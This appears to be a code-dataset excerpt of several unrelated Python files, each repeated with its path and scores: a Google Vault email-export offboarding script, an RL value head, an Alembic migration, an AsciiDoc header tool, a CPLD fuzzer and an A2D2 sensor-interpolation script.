url=credentials body=json.dumps( { 'text': "Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports" } ) headers={ 'Content-type': 'application/json' } response = requests.request( "POST", url, data=body, ) except: print("\033[1m"+"Issue Occured with generating links for notifications"+"\033[0m") sys.exit(1) vaultAccessToken=generate_vault_access_token(client_id,client_secret,refresh_token) input_filename='.txt' leaver_user=get_list_from_file(input_filename) adminAccountIDs='.txt' admin_users=get_list_from_file(adminAccountIDs) matter=generate_matter(leaver_user,vaultAccessToken) savedQueryID=generate_search_query(matter,vaultAccessToken) matterExportID=generate_export(savedQueryID,matter,vaultAccessToken) last_admin=set_matter_permissions(admin_users,matter,vaultAccessToken) generate_links_notify(matter,credentials)
google-workspace/offboarding-email-archive/python/google-vault-offboarding.py
import requests import json import sys #get the secrets from your Google Cloud project, use the Oauth2 Playground for your refresh token client_id=sys.argv[1] client_secret=sys.argv[2] refresh_token=sys.argv[3] credentials=sys.argv[4] def get_list_from_file(filename): try: # open and read the file into list with open(filename) as f: string_list = f.read().splitlines() f.close() print(string_list) return string_list except: print("\033[1m"+"Issue Occured with obtaining list from file"+"\033[0m") sys.exit(1) def generate_vault_access_token(client_id,client_secret,refresh_token): try: url = "https://www.googleapis.com/oauth2/v4/token" body = json.dumps({ "client_id": client_id, "client_secret": client_secret, "refresh_token": refresh_token, "grant_type": "refresh_token" }) headers = { "Accept" : "application/json", "Content-Type" : "application/json", } response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) vaultAccessToken = jsonContent["access_token"] return vaultAccessToken except: print("\033[1m"+"Issue Occured with generating Google Vault Access Token"+"\033[0m") sys.exit(1) def generate_matter(leaver_user,vaultAccessToken): try: matterList = [] for user in leaver_user: url = "https://vault.googleapis.com/v1/matters/" headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps ({ "state": "OPEN", "description": "Generated by Python", "name": user + "'s archive" }) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) matterID=jsonContent["matterId"] #print("Matter ID for " + user + " is " + matterID) print(jsonContent) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": "", "matterExportID": "" } } }) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter"+"\033[0m") sys.exit(1) def generate_search_query(matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) url = "https://vault.googleapis.com/v1/matters/"+matterID+"/savedQueries" headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body=json.dumps({ "displayName": user + "'s email search query", "query": { "corpus": "MAIL", "dataScope": "ALL_DATA", "searchMethod": "ACCOUNT", "accountInfo": { "emails": [user]}, "mailOptions": {"excludeDrafts" : "false"}, "timeZone": "Atlantic/Canary", "method": "ACCOUNT" }} ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) print(jsonContent) savedQueryID=jsonContent["savedQueryId"] #print("savedQueryId for " + user + " is " + savedQueryID + " matterID is " + matterID) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": savedQueryID, "matterExportID": "" } } } ) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter Search Query"+"\033[0m") sys.exit(1) def generate_export(savedQueryID,matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID']) print(user,matterID,savedQueryID) url = "https://vault.googleapis.com/v1/matters/",matterID,"/exports" url=''.join(url) print(url) headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps( { "name": user + "'s Export", "query": { "corpus": "MAIL", "dataScope": "ALL_DATA", "searchMethod": "ACCOUNT", "accountInfo": { "emails": [user]}, "mailOptions": {"excludeDrafts" : "false"}, "timeZone": "Atlantic/Canary", "method": "Account", }, "exportOptions": { "mailOptions": { "exportFormat": "MBOX", "showConfidentialModeContent": "true" }, "region": "any" } } ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) matterExportID=jsonContent["id"] print(jsonContent) #print("matterExportID for " + user + " is " + matterExportID + " searchQueryID is " + savedQueryID + " matterID is " + matterID) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": savedQueryID, "matterExportID": matterExportID } } } ) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter Export"+"\033[0m") sys.exit(1) def set_matter_permissions(adminAccountIDs,matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): for each in adminAccountIDs: print(each) print(matterList) matterID=(matter['matterInstance']['userInfo']['matterID']) url = "https://vault.googleapis.com/v1/matters/",matterID,":addPermissions" print(url) url=''.join(url) print(url) headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps( { "matterPermission": { "role": "COLLABORATOR", "accountId": each }, "sendEmails": "false", "ccMe": "false" } ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = (response.text) print(jsonContent) return each except: print("\033[1m"+"Issue Occured with setting Google Vault Matter permissions"+"\033[0m") sys.exit(1) def generate_links_notify(matterList,credentials): try: for matter in matterList: matterList = [] user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID']) exportID=(matter['matterInstance']['userInfo']['matterExportID']) print("************************************************************************************************************************************************************************************************************************************************************") print("Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports") print("Matter Link for " + user + " https://vault.google.com/matter/"+ matterID) print("Search Query Link for " + user + " https://vault.google.com/matter/"+ matterID + "/search") print("************************************************************************************************************************************************************************************************************************************************************") url=credentials body=json.dumps( { 'text': "Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports" } ) headers={ 'Content-type': 'application/json' } response = requests.request( "POST", url, data=body, ) except: print("\033[1m"+"Issue Occured with generating links for notifications"+"\033[0m") sys.exit(1) vaultAccessToken=generate_vault_access_token(client_id,client_secret,refresh_token) input_filename='.txt' leaver_user=get_list_from_file(input_filename) adminAccountIDs='.txt' admin_users=get_list_from_file(adminAccountIDs) matter=generate_matter(leaver_user,vaultAccessToken) savedQueryID=generate_search_query(matter,vaultAccessToken) matterExportID=generate_export(savedQueryID,matter,vaultAccessToken) last_admin=set_matter_permissions(admin_users,matter,vaultAccessToken) generate_links_notify(matter,credentials)
0.056165
0.114517
from typing import Mapping, Any, Type, Callable, Optional import abc import torch as tc from drl.agents.heads.abstract import Head from drl.agents.architectures.stateless.abstract import HeadEligibleArchitecture class ValueHead(Head, metaclass=abc.ABCMeta): """ Value head abstract class. """ class SimpleValueHead(ValueHead): """ Simple value prediction head. """ def __init__( self, num_features: int, head_architecture_cls: Type[HeadEligibleArchitecture], head_architecture_cls_args: Mapping[str, Any], w_init: Optional[Callable[[tc.Tensor], None]], b_init: Optional[Callable[[tc.Tensor], None]], **kwargs: Mapping[str, Any]): """ Args: num_features (int): Number of input features. head_architecture_cls (Type[HeadEligibleArchitecture]): Class object for policy head architecture. Must be a derived class of HeadEligibleArchitecture. head_architecture_cls_args (Mapping[str, Any]): Keyword arguments for head architecture. w_init (Callable[[torch.Tensor], None]): Weight initializer. b_init (Callable[[torch.Tensor], None]): Bias initializer. **kwargs (Mapping[str, Any]): Keyword arguments. """ super().__init__() self._value_head = head_architecture_cls( input_dim=num_features, output_dim=1, w_init=w_init, b_init=b_init, **head_architecture_cls_args) def forward( self, features: tc.Tensor, **kwargs: Mapping[str, Any]) -> tc.Tensor: """ Args: features (torch.Tensor): Torch tensor with shape [batch_size, num_features]. **kwargs (Mapping[str, Any]): Keyword arguments. Returns: torch.Tensor: Torch tensor of shape [batch_size], containing the estimated state-conditional values. """ vpred = self._value_head(features).squeeze(-1) return vpred
drl/agents/heads/value_heads.py
from typing import Mapping, Any, Type, Callable, Optional import abc import torch as tc from drl.agents.heads.abstract import Head from drl.agents.architectures.stateless.abstract import HeadEligibleArchitecture class ValueHead(Head, metaclass=abc.ABCMeta): """ Value head abstract class. """ class SimpleValueHead(ValueHead): """ Simple value prediction head. """ def __init__( self, num_features: int, head_architecture_cls: Type[HeadEligibleArchitecture], head_architecture_cls_args: Mapping[str, Any], w_init: Optional[Callable[[tc.Tensor], None]], b_init: Optional[Callable[[tc.Tensor], None]], **kwargs: Mapping[str, Any]): """ Args: num_features (int): Number of input features. head_architecture_cls (Type[HeadEligibleArchitecture]): Class object for policy head architecture. Must be a derived class of HeadEligibleArchitecture. head_architecture_cls_args (Mapping[str, Any]): Keyword arguments for head architecture. w_init (Callable[[torch.Tensor], None]): Weight initializer. b_init (Callable[[torch.Tensor], None]): Bias initializer. **kwargs (Mapping[str, Any]): Keyword arguments. """ super().__init__() self._value_head = head_architecture_cls( input_dim=num_features, output_dim=1, w_init=w_init, b_init=b_init, **head_architecture_cls_args) def forward( self, features: tc.Tensor, **kwargs: Mapping[str, Any]) -> tc.Tensor: """ Args: features (torch.Tensor): Torch tensor with shape [batch_size, num_features]. **kwargs (Mapping[str, Any]): Keyword arguments. Returns: torch.Tensor: Torch tensor of shape [batch_size], containing the estimated state-conditional values. """ vpred = self._value_head(features).squeeze(-1) return vpred
0.94325
0.326781
revision = '7829789fc19c' down_revision = 'cf<PASSWORD>b<PASSWORD>' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa table_name = 'permissions_system' column_name = 'permission' type_name = 'sys_perms' tmp_type_name = f"tmp_{type_name}" old_options = ('SUPERUSER', ) new_options = old_options + ('PERMISSION_VIEW', ) new_type = sa.Enum(*new_options, name=type_name) old_type = sa.Enum(*old_options, name=type_name) def upgrade(): ctx = op.get_context() dialect = ctx.dialect.name if dialect == 'postgresql': # Rename the enum type what we want to change. op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}") # Create the new enum. new_type.create(op.get_bind()) # # Alter detection status column. op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} " f"TYPE {type_name} USING {column_name}::text::{type_name}") # Drop the old enum. op.execute(f"DROP TYPE {tmp_type_name}") elif dialect == 'sqlite': with op.batch_alter_table(table_name) as batch_op: batch_op.alter_column( column_name, existing_type=old_type, type_=new_type) def downgrade(): ctx = op.get_context() dialect = ctx.dialect.name if dialect == 'postgresql': # Rename the enum type what we want to change. op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}") # Create the new enum. old_type.create(op.get_bind()) # Alter detection status column. op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} " f"TYPE {type_name} USING {column_name}::text::{type_name}") # Drop the old enum. op.execute(f"DROP TYPE {tmp_type_name}") elif dialect == 'sqlite': with op.batch_alter_table('table_name') as batch_op: batch_op.alter_column( column_name, existing_type=new_type, type_=old_type)
web/server/codechecker_server/migrations/config/versions/7829789fc19c_global_permission_to_get_access_controls.py
revision = '7829789fc19c' down_revision = 'cf<PASSWORD>b<PASSWORD>' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa table_name = 'permissions_system' column_name = 'permission' type_name = 'sys_perms' tmp_type_name = f"tmp_{type_name}" old_options = ('SUPERUSER', ) new_options = old_options + ('PERMISSION_VIEW', ) new_type = sa.Enum(*new_options, name=type_name) old_type = sa.Enum(*old_options, name=type_name) def upgrade(): ctx = op.get_context() dialect = ctx.dialect.name if dialect == 'postgresql': # Rename the enum type what we want to change. op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}") # Create the new enum. new_type.create(op.get_bind()) # # Alter detection status column. op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} " f"TYPE {type_name} USING {column_name}::text::{type_name}") # Drop the old enum. op.execute(f"DROP TYPE {tmp_type_name}") elif dialect == 'sqlite': with op.batch_alter_table(table_name) as batch_op: batch_op.alter_column( column_name, existing_type=old_type, type_=new_type) def downgrade(): ctx = op.get_context() dialect = ctx.dialect.name if dialect == 'postgresql': # Rename the enum type what we want to change. op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}") # Create the new enum. old_type.create(op.get_bind()) # Alter detection status column. op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} " f"TYPE {type_name} USING {column_name}::text::{type_name}") # Drop the old enum. op.execute(f"DROP TYPE {tmp_type_name}") elif dialect == 'sqlite': with op.batch_alter_table('table_name') as batch_op: batch_op.alter_column( column_name, existing_type=new_type, type_=old_type)
0.425725
0.111096
import os import re import argparse import glob def slurp_file(path): data = '' try: with open(path, 'r') as fin: data = fin.read() except IOError: pass if not (data and not data.isspace()): assent = input('Warning: ' + path + ' is empty; do you want to continue? [yN]') if not assent.lower().startswith('y'): exit(1) return data def process_file(std_header, std_footer, path): print("processing", path) bak_path = path + '.bak' os.rename(path, bak_path) with open(bak_path, 'r') as fin, open(path, 'w') as fout: data = fin.read() data = re.sub(r'(//\s*BEGIN STANDARD HEADER).*?(//\s*END STANDARD HEADER)', r'\1\n' + std_header + r'\2', data, flags=re.IGNORECASE+re.MULTILINE+re.DOTALL) data = re.sub(r'(//\s*BEGIN STANDARD FOOTER).*?(//\s*END STANDARD FOOTER)', r'\1\n' + std_footer + r'\2', data, flags=re.IGNORECASE+re.MULTILINE+re.DOTALL) fout.write(data) pass def process_folder(std_header, std_footer, pattern, wd): wd_realpath = os.path.realpath(wd) pattern = os.path.join(wd_realpath, os.path.join('**', pattern)) for path in glob.glob(pattern, recursive=True): process_file(std_header, std_footer, path) pass parser = argparse.ArgumentParser(description='Replace standard header/footer sections in AsciiDoc files') parser.add_argument('-H', '--header', default='std_header.adoc', help='Path to contents of new standard header, default=std_header.adoc') parser.add_argument('-F', '--footer', default='std_footer.adoc', help='Path to contents of new standard footer, default=std_footer.adoc') parser.add_argument('-P', '--pattern', default='*.adoc', help='Filename glob pattern, , default=*.adoc') parser.add_argument('workdirs', nargs='*', default=[os.getcwd()], help='Path(s) to folder(s) containing AsciiDoc files, default=.') args = parser.parse_args() std_header = slurp_file(args.header) std_footer = slurp_file(args.footer) for wd in args.workdirs: process_folder(std_header, std_footer, args.pattern, wd)
tools/codegen/update_hdr_ftr_adoc.py
import os import re import argparse import glob def slurp_file(path): data = '' try: with open(path, 'r') as fin: data = fin.read() except IOError: pass if not (data and not data.isspace()): assent = input('Warning: ' + path + ' is empty; do you want to continue? [yN]') if not assent.lower().startswith('y'): exit(1) return data def process_file(std_header, std_footer, path): print("processing", path) bak_path = path + '.bak' os.rename(path, bak_path) with open(bak_path, 'r') as fin, open(path, 'w') as fout: data = fin.read() data = re.sub(r'(//\s*BEGIN STANDARD HEADER).*?(//\s*END STANDARD HEADER)', r'\1\n' + std_header + r'\2', data, flags=re.IGNORECASE+re.MULTILINE+re.DOTALL) data = re.sub(r'(//\s*BEGIN STANDARD FOOTER).*?(//\s*END STANDARD FOOTER)', r'\1\n' + std_footer + r'\2', data, flags=re.IGNORECASE+re.MULTILINE+re.DOTALL) fout.write(data) pass def process_folder(std_header, std_footer, pattern, wd): wd_realpath = os.path.realpath(wd) pattern = os.path.join(wd_realpath, os.path.join('**', pattern)) for path in glob.glob(pattern, recursive=True): process_file(std_header, std_footer, path) pass parser = argparse.ArgumentParser(description='Replace standard header/footer sections in AsciiDoc files') parser.add_argument('-H', '--header', default='std_header.adoc', help='Path to contents of new standard header, default=std_header.adoc') parser.add_argument('-F', '--footer', default='std_footer.adoc', help='Path to contents of new standard footer, default=std_footer.adoc') parser.add_argument('-P', '--pattern', default='*.adoc', help='Filename glob pattern, , default=*.adoc') parser.add_argument('workdirs', nargs='*', default=[os.getcwd()], help='Path(s) to folder(s) containing AsciiDoc files, default=.') args = parser.parse_args() std_header = slurp_file(args.header) std_footer = slurp_file(args.footer) for wd in args.workdirs: process_folder(std_header, std_footer, args.pattern, wd)
0.234407
0.110807
from util import database, toolchain, bitdiff, progress with database.transact() as db: for device_name, device in db.items(): progress(device_name) package, pinout = next(iter(device['pins'].items())) gclk3_pad = device['specials']['CLK3'] gclr_switch = device['globals']['GCLR'] gclk_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GCLK')} goe_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GOE')} all_goe_choices = set() unique_goe_choices = set() for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if goe_choice in unique_goe_choices: unique_goe_choices.remove(goe_choice) elif goe_choice not in all_goe_choices: unique_goe_choices.add(goe_choice) all_goe_choices.add(goe_choice) unique_goe_choices.difference_update({ f"R_PAD", f"C1_PAD", f"C2_PAD", f"{gclk3_pad}_PAD", f"E1_PAD", }) goe_pads = [] for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if not goe_choice.endswith('_PAD'): continue if goe_choice not in unique_goe_choices: continue goe_pads.append(goe_choice) break def run(code, **kwargs): return toolchain.run( f"module top(input GCLR, GCLK1, GCLK2, GCLK3, " f" input GOE1, GOE2, GOE3, GOE4, GOE5, GOE6, " f" output Q); " f"{code} " f"endmodule", { 'GCLR': pinout['R'], 'GCLK1': pinout['C1'], 'GCLK2': pinout['C2'], 'GCLK3': pinout[gclk3_pad], **{ f"GOE{1+n}": pinout[pad[:-4]] for n, pad in enumerate(goe_pads) }, 'Q': pinout[device['macrocells']['MC1']['pad']], }, f"{device_name}-{package}", **kwargs) f_gclr_pos = run(f"DFFAR ff(.CLK(1'b0), .AR(GCLR), .D(1'b0), .Q(Q));") f_gclr_neg = run(f"wire GCLRn; INV in(GCLR, GCLRn); " f"DFFAR ff(.CLK(1'b0), .AR(GCLRn), .D(1'b0), .Q(Q));") gclr_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclr_pos, 'on': f_gclr_neg, }), }) for gclk_name, gclk_switch in gclk_switches.items(): f_gclk_pos = run(f"DFF ff(.CLK({gclk_name}), .D(1'b0), .Q(Q));") f_gclk_neg = run(f"wire {gclk_name}n; INV in({gclk_name}, {gclk_name}n); " f"DFF ff(.CLK({gclk_name}n), .D(1'b0), .Q(Q));") macrocell = device['macrocells']['MC1'] gclk_mux_option = macrocell['gclk_mux'] gclk_mux_value = 0 for n_fuse, fuse in enumerate(gclk_mux_option['fuses']): gclk_mux_value += f_gclk_pos[fuse] << n_fuse for gclk_mux_net, gclk_mux_net_value in gclk_mux_option['values'].items(): if gclk_mux_value == gclk_mux_net_value: break else: assert False assert gclk_mux_net == gclk_name gclk_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclk_pos, 'on': f_gclk_neg, }), }) for (goe_name, goe_switch), goe_pad in zip(goe_switches.items(), goe_pads): f_goe_pos = run(f"TRI t(GCLR, {goe_name}, Q);", strategy={"Global_OE": goe_pad}) f_goe_neg = run(f"wire {goe_name}n; INV in({goe_name}, {goe_name}n); " f"TRI t(GCLR, {goe_name}n, Q);", strategy={"Global_OE": goe_pad}) goe_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_goe_pos, 'on': f_goe_neg, }), })
fuzzers/028-gnet_invert/fuzzer.py
from util import database, toolchain, bitdiff, progress with database.transact() as db: for device_name, device in db.items(): progress(device_name) package, pinout = next(iter(device['pins'].items())) gclk3_pad = device['specials']['CLK3'] gclr_switch = device['globals']['GCLR'] gclk_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GCLK')} goe_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GOE')} all_goe_choices = set() unique_goe_choices = set() for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if goe_choice in unique_goe_choices: unique_goe_choices.remove(goe_choice) elif goe_choice not in all_goe_choices: unique_goe_choices.add(goe_choice) all_goe_choices.add(goe_choice) unique_goe_choices.difference_update({ f"R_PAD", f"C1_PAD", f"C2_PAD", f"{gclk3_pad}_PAD", f"E1_PAD", }) goe_pads = [] for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if not goe_choice.endswith('_PAD'): continue if goe_choice not in unique_goe_choices: continue goe_pads.append(goe_choice) break def run(code, **kwargs): return toolchain.run( f"module top(input GCLR, GCLK1, GCLK2, GCLK3, " f" input GOE1, GOE2, GOE3, GOE4, GOE5, GOE6, " f" output Q); " f"{code} " f"endmodule", { 'GCLR': pinout['R'], 'GCLK1': pinout['C1'], 'GCLK2': pinout['C2'], 'GCLK3': pinout[gclk3_pad], **{ f"GOE{1+n}": pinout[pad[:-4]] for n, pad in enumerate(goe_pads) }, 'Q': pinout[device['macrocells']['MC1']['pad']], }, f"{device_name}-{package}", **kwargs) f_gclr_pos = run(f"DFFAR ff(.CLK(1'b0), .AR(GCLR), .D(1'b0), .Q(Q));") f_gclr_neg = run(f"wire GCLRn; INV in(GCLR, GCLRn); " f"DFFAR ff(.CLK(1'b0), .AR(GCLRn), .D(1'b0), .Q(Q));") gclr_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclr_pos, 'on': f_gclr_neg, }), }) for gclk_name, gclk_switch in gclk_switches.items(): f_gclk_pos = run(f"DFF ff(.CLK({gclk_name}), .D(1'b0), .Q(Q));") f_gclk_neg = run(f"wire {gclk_name}n; INV in({gclk_name}, {gclk_name}n); " f"DFF ff(.CLK({gclk_name}n), .D(1'b0), .Q(Q));") macrocell = device['macrocells']['MC1'] gclk_mux_option = macrocell['gclk_mux'] gclk_mux_value = 0 for n_fuse, fuse in enumerate(gclk_mux_option['fuses']): gclk_mux_value += f_gclk_pos[fuse] << n_fuse for gclk_mux_net, gclk_mux_net_value in gclk_mux_option['values'].items(): if gclk_mux_value == gclk_mux_net_value: break else: assert False assert gclk_mux_net == gclk_name gclk_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclk_pos, 'on': f_gclk_neg, }), }) for (goe_name, goe_switch), goe_pad in zip(goe_switches.items(), goe_pads): f_goe_pos = run(f"TRI t(GCLR, {goe_name}, Q);", strategy={"Global_OE": goe_pad}) f_goe_neg = run(f"wire {goe_name}n; INV in({goe_name}, {goe_name}n); " f"TRI t(GCLR, {goe_name}n, Q);", strategy={"Global_OE": goe_pad}) goe_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_goe_pos, 'on': f_goe_neg, }), })
0.316158
0.255657
import pandas as pd import numpy as np import matplotlib.pyplot as plt from scipy.interpolate import CubicSpline import json """ Please download the original bus signals data of each city from a2d2: https://www.a2d2.audi/a2d2/en/download.html the available locations are "Gaimersheim", "Munich" and "Ingolstadt" and save it in the Original_data folder """ # adapt file path to the Original_data folder. file_path = 'Original_data/<location>/bus_signals.json' df = pd.read_json(file_path) print(df) acc_x = np.array(df["acceleration_x"]["values"]) # create an array containing the values of acceleration acc_y = np.array(df["acceleration_y"]["values"]) veh_speed = np.array(df["vehicle_speed"]["values"]) # plotting each sensor separately fig, axes = plt.subplots(22, 1, figsize=(15, 60)) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) ax.plot(att[:, 0], att[:, 1]) ax.title.set_text(col) plt.show() # search for the minimum Timestamp TS_min = acc_x[:, 0][0] col_min = "acceleration_x" print("initial TS", TS_min) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] < TS_min: TS_min = x[idx] # print(col, ax) col_min = col print("minimal TS ", TS_min, " / ", col_min) # search for the maximum Timestamp TS_max = acc_x[:, 0][0] print("initial TS", TS_max) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] > TS_max: TS = x[idx] TS_max = TS # print(col, ax) col_max = col print("Final TS ", TS, " / ", TS_max, " / ", col_max) # look for the minimum timestamp difference min_sensor = np.array(df[col_min]["values"]) min_TS_diff = min_sensor[1][0] - min_sensor[0][0] Min_column = np.array(df.columns[0]) print(Min_column) for (col, ax) in zip(df.columns, axes): att1 = np.array(df[col]["values"]) for idx in range(len(att1)): x_diff = att1[idx][0] - att1[idx - 1][0] if 0 < x_diff < min_TS_diff: min_TS_diff = x_diff Min_column = col print("minimium time difference ", min_TS_diff, " ", "Column", Min_column) # search for the sensor having the min nbr of values Min_S = np.array(df[df.columns[0]]["values"]) Sensor_MIN = df.columns[0] for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) < len(Min_S): Min_S = S Sensor_MIN = col print("minimum sensor", Min_S, " ", Sensor_MIN, " ", len(Min_S)) print("Here is the size of all sensors values") for (col, ax) in zip(df.columns, axes): print(col, " ", len(df[col]["values"])) # #search for the sensor having the max nbr of values Max_S = np.array(df[df.columns[0]]["values"]) Sensor_MAX = df.columns[0] print("initial SensorMax", Sensor_MAX) print(len(df["acceleration_x"]["values"]), " ", len(acc_x[:, 0])) for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) > len(Max_S): print("HEY ", len(S), len(Min_S)) Max_S = S Sensor_MAX = col print("maximum sensor", Max_S, " ", Sensor_MAX, " ", len(Max_S)) # create a new timeline timeline = [TS_min] i = 0 while timeline[i] < TS_max: timeline.append(timeline[i] + min_TS_diff) i = i + 1 timeline[len(timeline) - 1] = TS_max # writing interpolated data in a json file new_data_dict = dict() with open('Interpolated_data/data_Ingolstadt.json', 'w') as f: for (col, ax) in zip(df.columns, axes): data_list = list() att = np.array(df[col]["values"]) x = att[:, 0] y = att[:, 1] cs = CubicSpline(x, y) y_new = cs(timeline) for i in range(len(y_new)): data_list.append([int(timeline[i]), y_new[i]]) new_data_dict[col] = ({'unit': df[col]["unit"], 'values': data_list}) json.dump(new_data_dict, f, sort_keys=True, indent=4)
Clustering_approach/Data_interpolation.py
import pandas as pd import numpy as np import matplotlib.pyplot as plt from scipy.interpolate import CubicSpline import json """ Please download the original bus signals data of each city from a2d2: https://www.a2d2.audi/a2d2/en/download.html the available locations are "Gaimersheim", "Munich" and "Ingolstadt" and save it in the Original_data folder """ # adapt file path to the Original_data folder. file_path = 'Original_data/<location>/bus_signals.json' df = pd.read_json(file_path) print(df) acc_x = np.array(df["acceleration_x"]["values"]) # create an array containing the values of acceleration acc_y = np.array(df["acceleration_y"]["values"]) veh_speed = np.array(df["vehicle_speed"]["values"]) # plotting each sensor separately fig, axes = plt.subplots(22, 1, figsize=(15, 60)) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) ax.plot(att[:, 0], att[:, 1]) ax.title.set_text(col) plt.show() # search for the minimum Timestamp TS_min = acc_x[:, 0][0] col_min = "acceleration_x" print("initial TS", TS_min) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] < TS_min: TS_min = x[idx] # print(col, ax) col_min = col print("minimal TS ", TS_min, " / ", col_min) # search for the maximum Timestamp TS_max = acc_x[:, 0][0] print("initial TS", TS_max) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] > TS_max: TS = x[idx] TS_max = TS # print(col, ax) col_max = col print("Final TS ", TS, " / ", TS_max, " / ", col_max) # look for the minimum timestamp difference min_sensor = np.array(df[col_min]["values"]) min_TS_diff = min_sensor[1][0] - min_sensor[0][0] Min_column = np.array(df.columns[0]) print(Min_column) for (col, ax) in zip(df.columns, axes): att1 = np.array(df[col]["values"]) for idx in range(len(att1)): x_diff = att1[idx][0] - att1[idx - 1][0] if 0 < x_diff < min_TS_diff: min_TS_diff = x_diff Min_column = col print("minimium time difference ", min_TS_diff, " ", "Column", Min_column) # search for the sensor having the min nbr of values Min_S = np.array(df[df.columns[0]]["values"]) Sensor_MIN = df.columns[0] for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) < len(Min_S): Min_S = S Sensor_MIN = col print("minimum sensor", Min_S, " ", Sensor_MIN, " ", len(Min_S)) print("Here is the size of all sensors values") for (col, ax) in zip(df.columns, axes): print(col, " ", len(df[col]["values"])) # #search for the sensor having the max nbr of values Max_S = np.array(df[df.columns[0]]["values"]) Sensor_MAX = df.columns[0] print("initial SensorMax", Sensor_MAX) print(len(df["acceleration_x"]["values"]), " ", len(acc_x[:, 0])) for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) > len(Max_S): print("HEY ", len(S), len(Min_S)) Max_S = S Sensor_MAX = col print("maximum sensor", Max_S, " ", Sensor_MAX, " ", len(Max_S)) # create a new timeline timeline = [TS_min] i = 0 while timeline[i] < TS_max: timeline.append(timeline[i] + min_TS_diff) i = i + 1 timeline[len(timeline) - 1] = TS_max # writing interpolated data in a json file new_data_dict = dict() with open('Interpolated_data/data_Ingolstadt.json', 'w') as f: for (col, ax) in zip(df.columns, axes): data_list = list() att = np.array(df[col]["values"]) x = att[:, 0] y = att[:, 1] cs = CubicSpline(x, y) y_new = cs(timeline) for i in range(len(y_new)): data_list.append([int(timeline[i]), y_new[i]]) new_data_dict[col] = ({'unit': df[col]["unit"], 'values': data_list}) json.dump(new_data_dict, f, sort_keys=True, indent=4)
0.28897
0.577019
